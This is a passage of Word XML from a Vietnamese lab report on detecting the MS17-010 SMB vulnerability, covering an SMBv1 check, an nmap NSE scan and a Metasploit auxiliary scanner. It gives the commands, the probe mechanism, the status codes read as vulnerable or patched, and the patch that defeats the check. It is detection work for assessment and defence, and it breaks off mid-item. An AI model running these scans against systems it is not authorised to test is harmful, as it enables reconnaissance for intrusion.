        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Inference Boundary:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kết luận hệ thống hỗ trợ giao thức cũ SMBv1 (xác nhận tiền điều kiện </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>D = \text{True}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đạt Cấp độ 2). Không chứng minh được hệ thống có lỗ hổng vì hệ thống đã vá vẫn có thể bật SMBv1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558CD837" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Limitation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Không phát hiện được nếu dịch vụ SMB yêu cầu bắt buộc ký số (SMB Signing Required) ở mức độ ngăn chặn phiên thăm dò nặc danh ban đầu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F9ECF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Defense Breakpoint:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bị bẻ gãy khi thực hiện cấu hình vô hiệu hóa máy chủ SMBv1 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>D = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_2</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648C2318" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.4.3. Kỹ thuật 3: Dò quét phát hiện dấu hiệu lỗ hổng bằng Nmap NSE (`smb-vuln-ms17-010.nse`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B3CE3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Input:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>nmap -p 445 --script smb-vuln-ms17-010 --script-args unsafe=0 -n -Pn 192.168.10.20</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CBC341" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Ý nghĩa tham số an toàn:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trong mã nguồn kịch bản </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>smb-vuln-ms17-010.nse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [9], tham số </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>unsafe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> điều khiển mức độ can thiệp vào driver của hệ thống đích. Nếu kích hoạt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>unsafe=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, kịch bản sẽ phát sinh thêm các gói tin thăm dò sâu có khả năng gây xung đột và làm mất ổn định driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Cấu hình tường minh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>--script-args unsafe=0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là bắt buộc nhằm bảo đảm kịch bản chỉ sử dụng cơ chế thăm dò kiểm tra tham số an toàn thông qua hàm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PeekNamedPipe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (mã </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0x2300</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) trên đường ống </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IPC$</w:t>
      </w:r>
      <w:r>
        <w:t>, nhận diện lỗ hổng thuần túy qua mã trạng thái phản hồi mà không gây rủi ro làm xáo trộn vùng nhớ Non-Paged Pool của hệ điều hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0E78F1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Preconditions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{True}, S = \text{True}, D = \text{True}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (cổng 445 mở, dịch vụ chạy, chấp nhận SMBv1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024297B6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Internal Mechanism:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kịch bản thực hiện tuần tự: (a) Bắt tay đàm phán SMBv1; (b) Khởi tạo phiên nặc danh (Null Session) qua </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Session Setup AndX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; (c) Gửi yêu cầu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tree Connect AndX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gắn kết tài nguyên chia sẻ ẩn liên tiến trình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\\IP\IPC$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; (d) Gửi một bản tin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB_COM_TRANSACTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (opcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0x25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) chứa hàm con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PeekNamedPipe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (mã </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0x2300</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) với tham số </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MaxDataCount</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thiết lập giá trị tối đa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0xFFFF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [8], [9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC2D2CB" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Observation Point:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bản tin phản hồi SMB trong tệp tin pcap tại trạm Kali Linux và trạm máy mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001DA000" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Success Criterion (Phát hiện dấu hiệu lỗ hổng):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> của máy mục tiêu phản hồi mã lỗi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>STATUS_INSUFF_SERVER_RESOURCES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0xC0000205</w:t>
      </w:r>
      <w:r>
        <w:t>). Kịch bản kết luận hệ thống có dấu hiệu lỗ hổng (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>State: VULNERABLE</w:t>
      </w:r>
      <w:r>
        <w:t>) tương ứng Cấp độ 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8FD9D9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Failure Criterion (Không phát hiện dấu hiệu):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Máy mục tiêu phản hồi mã lỗi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>STATUS_ACCESS_DENIED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0xC0000022</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>STATUS_INVALID_HANDLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0xC0000008</w:t>
      </w:r>
      <w:r>
        <w:t>), kịch bản kết luận hệ thống có khả năng cao đã được vá an toàn (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NOT VULNERABLE / Likely Patched</w:t>
      </w:r>
      <w:r>
        <w:t>) [8], [9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A51601" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Output / Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Đoạn văn bản kết luận lỗ hổng của NSE script chứa mã CVE-2017-0144 và điểm rủi ro; trường </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NT Status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trong tiêu đề gói tin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB Header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> phản hồi ghi nhận giá trị </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0xC0000205</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6049E0BF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Inference Boundary:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Chỉ chứng minh driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> xử lý logic kiểm tra tham số theo mẫu của hệ thống chưa vá (xác nhận tiền điều kiện </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>V = \text{True}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đạt Cấp độ 3). Không chứng minh được việc khai thác thực tế sẽ thành công, do chưa kiểm chứng khả năng phân bổ và kiểm soát vùng nhớ kernel pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3FD96B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Limitation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nếu máy mục tiêu cấu hình chính sách từ chối hoàn toàn phiên nặc danh (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>RestrictAnonymous = 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) và người kiểm thử không cung cấp tài khoản xác thực hợp lệ, kịch bản không thể mở kênh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IPC$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và trả về kết quả không xác định (Inconclusive).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65848761" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Defense Breakpoint:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bị bẻ gãy khi hệ điều hành được cài đặt bản cập nhật KB4012212 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>V = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_1</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284A8635" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.4.4. Kỹ thuật 4: Khảo sát đối chứng độc lập bằng Metasploit Auxiliary Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0B5D4B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Input:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Module </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>auxiliary/scanner/smb/smb_ms17_010</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trong Metasploit Framework với tham số </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>RHOSTS 192.168.10.20</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2506EF5F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Preconditions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{True}, S = \text{True}, D = \text{True}</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619E349" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Internal Mechanism:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Module độc lập phát sinh gói tin thăm dò tương tự kịch bản NSE nhưng sử dụng cấu trúc phân tích đối chứng của Metasploit, nhằm kiểm tra chéo (Cross-validation) tính nhất quán của phản hồi từ driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mà không kích hoạt shellcode [5], [6].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A311DD7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Observation Point:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nhật ký điều khiển Metasploit console và lưu lượng mạng bắt trên card </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4952B565" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Success Criterion:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Console hiển thị thông báo nhận diện máy mục tiêu tồn tại lỗ hổng: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[+] 192.168.10.20:445 - Host is likely VULNERABLE to MS17-010!</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0505B9F0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
